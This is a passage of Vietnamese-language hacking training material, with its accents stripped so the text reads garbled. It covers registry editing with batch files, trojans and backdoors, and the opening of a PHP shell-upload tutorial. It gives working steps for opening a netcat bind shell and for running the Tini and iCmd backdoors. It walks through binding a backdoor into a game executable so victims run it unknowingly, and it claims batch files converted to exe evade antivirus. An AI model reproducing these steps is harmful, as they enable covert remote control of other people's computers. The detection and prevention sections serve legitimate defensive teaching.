Bc 1: To ra c mt file.bat vi ni dung mong mun nh phn u ca v d
Bc 2: Chy file.reg va to ra
Bc 3: Xa ht cc file to ra
Kt qu sau khi to ra v chy file.bat vi ni dung ny s thm c mt key vo
Registry
V d 4: Sau khi thm c mt key vo gi ti li mun xa mt key trong
Registry th phi to ra mt file.bat vi ni dung ra sao:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Mt file.bat vi ni dung nh trn c hy s thc hin cc tc v g:
Bc 1: To ra file.reg vi ni dung mong mun. Khi mt folder l dng th 2
c la chn, trong mt folder ca Registry c nhiu key nhng ti ch mun xa
mt key l TOCBATDAT th ti c dng th 3. Dng th 4 l xa c mt folder
trong Registry.
Bc 2: Chy file.reg
Bc 3: xa ht cc file to ra.
Kt lun trong mc 3 ny ti hng dn mi ngi cch Edit (Thm, sa,
xa) Registry bng cu lnh, c bit l bng file.bat
4. ng dng cu hnh REGISTRY
Registry l ni lu ton b cc thit lp ca h thng Windows.
V d 5: Uninstall bt k chng trnh no. Trc tin chng ta hiu bn cht ca
vn Uninstall mt chng trnh l th no:
- Bc 1: tt tin trnh, tt services
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Bc 2: Xa ht nhng g lin quan ti chng trnh trong Regisry
- Bc 3: Xa thng tin trong Program files
thc hin bc 1: ta c cu lnh: Taskkill /F /IM Processname tt mt
tin chnh, tt mt services chng ta c cu lnh net stop servicename, disable
mt services c cu lnh sc config servicename start= disabled
thc hin bc 2: Trong mc 3 ti trnh by cch xa mt folder, key
trong registry vy l chng ta c th thc hin bc 2 ca Uninstall. uninstall
hon ton mt chng trnh yu cu chng ta phi tm c tt c cc key, folder
ca chng trnh trong registry. iu dn ti nu mt chng trnh ln nh
Microsoft office bn mun remove kiu ny l cc kh. Ti c mt kinh nghim
khi vit ra mt file.bat remove phn mm symantec phi lm mt 3 ngy v n
c 500 key trong registry cn xa.
thc hin bc 3: Xa file c cu lnh delete file /f /q. Xa ht file trong
mt foder dng cu lnh delete c:\folder\* /f /q
Tch hp tt c cc bc trong mt file.bat l c th thc hin c tt c mi
vic.
V d 6: Khng cho php mt file c kh nng chy trn my tnh.
V d ny cho php chng ta to ra mt file.bat ngn chn mt con virus khng cho
n chy trn my ca chng ta.
Bn cht ca qu trnh l s dng Group Policy trong phn Software retriction
rules hash rule. Nhng Group Policy ch l giao din ha edit Registry,
cho nn chng ta hon ton c th edit regisry lm mt tc v tng t.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
5. Kt lun
Vic s dng file.bat cu hnh c Registry mang li nhiu gi tr gip cc bn
nghin cu v bo mt v hiu bit su hn v h thng. c bit khi cc file.bat
ny chuyn sang file.exe khng bao gi b coi l virus.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn VII. Backdoor v Trojan ton tp
Trong bi vit ny ti s trnh by vi cc bn v Trojan v Backdoor. Nhng khi
nim c bn v Trojan v Backdoor, phn loi v cch thc ly nhim Trojan v
Backdoor. Cng vi nhng kin thc khc nh s dng mt s Trojan c bn, cch
thc n Trojan vo trong mt file .Exe. Cui cng ti s a ra cc gii php
phng chng Trojan v Backdoor.
1. Gii thiu v Trojans
2. Cc dng v cch hot ng ca Trojan
3. Cch nhn bit my tnh b nhim Trojan
4. S khc nhau ca cc Trojans
5. S dng mt s Trojan tn cng
6. Ghp mt hay nhiu Trojans vo mt file .EXE bnh thng
7. Cch pht hin Trojans v Backdoor
8. Gii php phng chng Trojan Backdoor
9. Kt lun
1. Gii thiu v Trojans.
- Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.
- Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my tnh
ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v
nhiu kh nng khc.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
2. Cc dng v cch hot ng ca Trojan
- K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi chng
Online.
- K tn cng c th truy cp v iu khin ton b my tnh ca nn nhn, v
chng c kh nng s dng vo nhiu mc ch khc nhau.
- Cc dng Trojans c bn:
+Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.
+ Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng
+ Destructive Trojans Ph hy h thng
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
+ Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.
+ Proxy Trojans
+ HTTP, FTP Trojans: - Trojan t to thnh HTTP hay FTP server k tn cng
khai thc li.
+ Security Software Disable Trojan C tc dng tt nhng tnh nng bo mt
trong my tnh ca nn nhn.
- Mc ch ca nhng k vit ra nhng Trojans:
+ Ly thng tin ca Credit Card
+ Ly thng tin ca cc ti khon c nhn nh: Email, Password, Usernames,
+ Nhng d liu mt.
+ Thng tin ti chnh: Ti khon ngn hng
+ S dng my tnh ca nn nhn thc hin mt tc v no , nh tn cng,
scan, hay lm ngp h thng mng ca nn nhn.
3. Nhng con ng my tnh nn nhn nhim Trojan.
- Qua cc ng dng CHAT online nh IRC Interney Relay Chat
- Qua cc file c nh km trn Mail
- Qua tng vt l nh trao i d liu qua USB, CD, HDD
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Khi chy mt file b nhim Trojan
- Qua NetBIOS FileSharing
- Qua nhng chng trnh nguy him
- T nhng trang web khng tin tng hay nhng website cung cp phn mm
min ph
- N c kh nng n trong cc ng dng bnh thng, khi chy ng dng lp tc
cng chy lun Trojans.
4. Nhng cch nhn bit mt my tnh b nhim Trojans C bn nht C
th khng ng.
- CD-ROM t ng m ra ng vo.
- My tnh c nhng du hiu l trn mn hnh.
- Hnh nn ca cc ca s Windows b thay i
- Cc vn bn t ng in
- My tinh t ng thay i font ch v cc thit lp khc
- Hnh nn my tnh t ng thay i v khng th i li.
- Chut tri, chut phi ln nn..
- Chut khng hin th trn mn hnh.
- Nt Start khng hin th.
- Mt vi ca s cht bt ra
Cc Port s dng bi cc Trojan ph bin.
- Back Orifice S dng UDP protocol S dng Port 31337 v 31338
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Deep Throat S dng UDP protocol S dng Port 2140 v 3150
- NetBus S dng TCP Protocol S dng Port 12345 v 12346
- Whack-a-mole S dng TCP Qua Port 12361 v 12362
- Netbus 2 Pro S dng TCP Qua Port 20034
- GrilFriend - S dng Protocol TCP Qua Port 21544
- Masters Paradise - S dng TCP Protocol qua Port 3129, 40421,40422, 40423
v 40426.
nhn bit nhng Port no trn my tnh ang Active chng ta dng cu lnh:
Netstat
an
5. S dng mt s loi Trojan
Vi mc ch ca bi vit cc bn hiu v Trojan, s dng Trojan l mt trong
nhng ni dung c bn ca nghin cu v bo mt. Khi bit cch s dng v cch
hot ng ca cc loi Trojan bn c th t a ra cc gii php an ninh mng
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
cho doanh nghip ca mnh cng nh nhng d liu quan trng ca chng ta.
Trong phn ny ti gii thiu vi cc bn nhng loi Trojan sau:
- Tini
- iCmd
- Netcat
- HTTP RAT
a. Trojan Tini
Bt k mt my tnh no nu b nhim Trojan ny u cho php Telnet qua Port
7777 khng cn bt k thng tin xc thc no.
- Trojan ny nhim vo h thng th ch cn chy mt ln hoc Enter file l
OK mi th hon tt v i nhng thng tin Telnet ti port 7777.
- Trn my 192.168.1.33 chy file tini.exe gi ti ng trn bt k my no
cng c th dng lnh: Telnet 192.168.1.33 7777 l c th console vo c my
.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
b. iCmd Trojan
Tng t nh Tini Trojan nhng khc mt iu l cho php la chn port
telnet v Password truy cp vo my b nhim trojan ny.
VD: My b nhim Trojan chy file iCmd.exe vi cu lnh
- iCmd.exe vne 8080
C ngha my ny enable telnet trn port 8080 v password l vne
Trong v d ny ti file: iCmd.exe ti th mc vnexperts.net trn C:\
- Trn my khc ti c th telnet ti my ny vi cu lnh:
- Telnet port
- Nh v d trn ti g: telnet 192.168.1.33 8080
H thng bt ti nhp password ti g vne vo v Enter
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
V kt qu
c. Netcat Trojan.
Trojan ny cho php chng ta la chn kh nhiu Options nh Port, chy ch
n, cho php telnet ..
chy Trojan ny ti g cu lnh:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Nc.exe L p -t e
-L l hot ng ch nghe
-p l Port s dng nghe.
-t cho php s dng Telnet
-e chy mt chng trnh no .
Trn v d ny ti chy vi cu lnh
- Nc.exe L p 8800 t e cmd.exe
Gi th ti c th ng bt k trn my no c th telnet ti my ny qua cng
8800, v hon ton c th kim sot c my tnh qua giao din command
line.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
d. HTTP RAT
Vi tnh nng hot ng nh mt Web Server c lp trnh sn cho php qun l
my tnh trn giao din Web. Bn hon ton c th thc hin c trn Internet,
khi mt my nhim Trojan ny s t ng gi mail v cho bn qua cu hnh.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Gi ng trn bt k my no bn cng c th vo my ny qua ca s ca mt
trnh duyt web bt k:
http://192.168.1.33
Ti c th chy xa hay download bt k file no t my nn nhn
e. ICMP Trojan
S dng tunnel l ICMP gn nh c s ng ca bt k firewall no hay cc
h thng.
- Trn my nn nhn s dng ICMP Trojan Server chng ta phi ci Trojan ny
vi cu lnh
http://192.168.1.33/
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Ngi trn bt k my no bn s dng ICMPsend remote ti h thng b
nhim ICMP trojan
Trn thc t cn rt nhiu loi Trojan khc bn c th tm hiu trn cc trang web
chuyn v security, trong bi vit ny ti ch Demo mt s loi Trojan dng
trainning m thi.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
6. Cch n mt hoc nhiu Trojan vo mt file .exe hay file chy bnh thng
My phn bn trn l cch s dng Trojan c bn. V d bn mun s dng con
trojan l iCmd.exe bn phi lm th no? Copy file vo my v chy vi cu
lnh iCmd.exe vne 8800? iu ny khng th thc hin bi ai cho bn ngi trn
my .
Vy lm th no ly nhim Trojan ny vo my ca nn nhn?
Tht khng may nhng k tn cng khn ngoan n mt hay nhiu Trojan vo
mt file Exe bnh thng, nh mt chng trnh c, mt file exe b ci windows,
file chy ca cc phn mm min ph m c khi n lun vo b ci cc chng
trnh dit virus.
Cch n Trojan vo file .exe l cng ngh Wrapper. Cc phn mm thng
dng:
- One file EXE Maker
- Yet Another Binder
- Pretator Wrapper.
a. S dng One file EXE Maker du v chy file iCmd.exe
Download b ci ca phn mm ny ci ra my sau l chy ghp cc file
File EXE m ti la chn l mt chng trnh c Caro rt ph bin Fiver6_8.exe.
- File c caro ti chy bnh thng
- file iCmd.exe ti chy n v copy vo h thng
- Cu lnh thm trn file iCmd.exe ti chn l vne 8800 cho php telnet vo port
8800 v password l vne.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Nhn Save hon thnh qu trnh.
- Ti save ra vi tn l caro.exe
Nhn dung lng ca file ti thy:
- iCmd.exe dung lng 36KB
- Fiver6_8_en.exe dung lng 310K
- Caro.exe c to t hai file trn dung lng 353KB
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Gi ti th chy file Caro.exe
Ch c ca s nh c caro c bt ra nhng c mt file iCmd.exe c hot
ng, kim tra trong Task Manager:
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
ng trn bt k my no ti cng c th remote ti my ny qua port 8800 v
password l vne
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Trong bi vit ny ti ch Demo mt chng trnh n file Exe cc bn c th tm
kim cc phn mm ny trn Internet.
7. Cch pht hin Trojan.
C ba nguyn l ca bt k chng trnh Trojan no:
- Mt trojan mun hot ng phi lng nghe cc request trn mt cng no
- Mt chng trnh ang chy s phi c TN trong Process List
- Mt chng trnh Trojan s lun chy cng lc khi my tnh khi ng.
a. Pht hin Port s dng bi Trojans
- Dng cu lnh Netstat an trong windows bit ht thng ang lng nghe trn
cc port no
+ Hnh di ta thy c port 7777 th ra l port ca Tini Trojan
+ My ca ti u c s port no l 8800 sao li ang ch nghe v c my
ang kt ni n nh chc l ca Trojans
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
- Dng phn mm Fport
- Dng phn mm TCPView
Tht may ti c th xem ton b cc port ang s dng v chng trnh g ti ang
s dng port no
T y ti c th kim tra cc dch v mng ca ti vi nhng Port nghi ng ti c
th dng Firewall ng li.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
b. Cch pht hin cc chng trnh ang chy
- Dng phn mm Process Viewer tt c cc Process s c hin th d c ang
chy ch n v khng hin trn Task Manager ca Windows.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
c. Tm mt chng trnh chy lc khi ng
- Trong Satup
- Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig trong
Table Starup chng trnh no mun chy t ng s phi nm ti y.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Trong v d ny ti thy c file nc.exe chy lc khi ng v tr ca n l ti folder
c:\vnexperts.net
8. Cch phng chng Trojans v Backdoor
- Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh
Trojans)
- Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScript trn
cc trang web bi c th s nh km Trojans
- Ti quan trng l phi update OS thng xuyn
- Ci phn mm dit virus uy tn: Ti hay dng: Kaspersky Internet Security,
Norton Internet Security, v Mcafee Total Security, nhng nghe ni cn rt nhiu
phn mm dit Virus v chng Trojan hay khc. Sau khi ci cc phn mm ny bn
hy update n thng xuyn.
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
9. Kt lun.
Trong bi vit ny ti trnh by cc khi nim c bn th no l Trojans
Backdoor, cch chng ly nhim vo h thng. Mt vi trojans demo cho cc bn
hiu s nguy him ca Trojan. Quan trng nht l cc bn hy bo v chnh mi
trng ca mnh trc cc tn cng t bn ngoi.
Theo Tocbatdat ca Vnexperts Research Department
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Phn VIII. K thut hack Web s dng upload file PHP v cch phng chng
Website thng mi hay cc forum t pht trin t PHP cho php upload hnh
nh rt d b hacker tn cng qua cch upload nhng Shell ln v chim quyn
iu khin. Trong bi vit ny ti s hng dn cc bn k thut upload mt file
PHP chim quyn iu khin my ch v cch phng chng li ny i vi cc
qun tr website.
L hng ny khi kim tra vi cc Tools scan uy tn nh: Acunetix, IBM App Scan..
ch mc Low c ngha l mc nguy him thp nhng li c th chim quyn
iu khin web server. Vi mc ch quan trng nht ca bi vit l cho ngi
qun tr web hiu c cc nguy c tim n, cc cch khai thc v phng v ra sao.
Bi vit c chia ra cc mc
1. Tools cn thit
2. K thut upload file PHP v chim quyn iu khin my ch web
3. K thut bo mt cho my ch web fix l hng bo mt ny
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
I. Cc tools cn thit
- Burpsuite_v1.3
- Java framework
- firefox
- website b li
- r57vn.php
1. Burpsuite_v1.3
y l mt Tool vit trn nn Java nn mun chy c tools ny phi ci
Java trc. Tools ny lm vic nh mt web proxy nhng n l mt
intercepting proxy.
Intercepting proxy: l mt proxy cho php iu chnh ni dung ca gi tin
ngi dng truyn nn web server. Do khi ta s dng tools ny cho php
thay i ni dung yu cu t trnh duyt web gi ln web server.
Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip
1. Java
y l b ci Java cho php cc chng trnh java chy trn my tnh
Link download: http://sun.com
2. firefox
S dng firefox bi mt s k thut khng s dng IE c
3. Website b li
Khng khuyn co mi ngi i hack cc trang web khc. Hacker m trng
ch hack cc trang web c s cho php ca ngi ch qun website. Bi
http://www.portswigger.net/suite/burpsuite_v1.3.ziphttp://sun.com/
Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
vit ny ti s hack trc tip vo trang web ca ti l trang
http://tocbatdat.com Trang web pht trin trn nn php v dnh l hng.
4. r57vn.php
L mt Shell cho php lm nhiu tc v trn webserver mt cch n gin
II. K thut upload file PHP v chim quyn iu khin my ch web
1. Chun b
Bc 1: ci t Java
Bc 2: Download burpsuite_v1.3 v gii nn ra s thy file .jar th dng li
Bc 3: Ci t firefox
Bc 4: Chun b trnh duyt IE (s dng IE upload file) bi cu hnh
proxy trn IE n gin hn
Bc 5: Kt ni Internet v truy cp trang web http://tocbatdat.com (trong
trng hp website ny ti fix l hng cc bn c th kim web khc
dnh l hng ny demo).
2. Thc hin Upload file php ln website
a. Kin thc chung
Hu ht cc trang web hin nay u ch cho upload mt s dng file nht
nh nh: jpg, gif, v khng cho php upload cc nh dng file khc vy
chng ta lm th no upload mt file PHP ln website ny.
Trc ht chng ta phi hiu c website lm th no pht hin ra file
ny khng phi l cc nh dng cho php c hai cch website kim tra:
+ Kim tra nh dng file (dng ny rt thng dng)
+ Kim tra ui file (dng ny th khng nhiu)
http: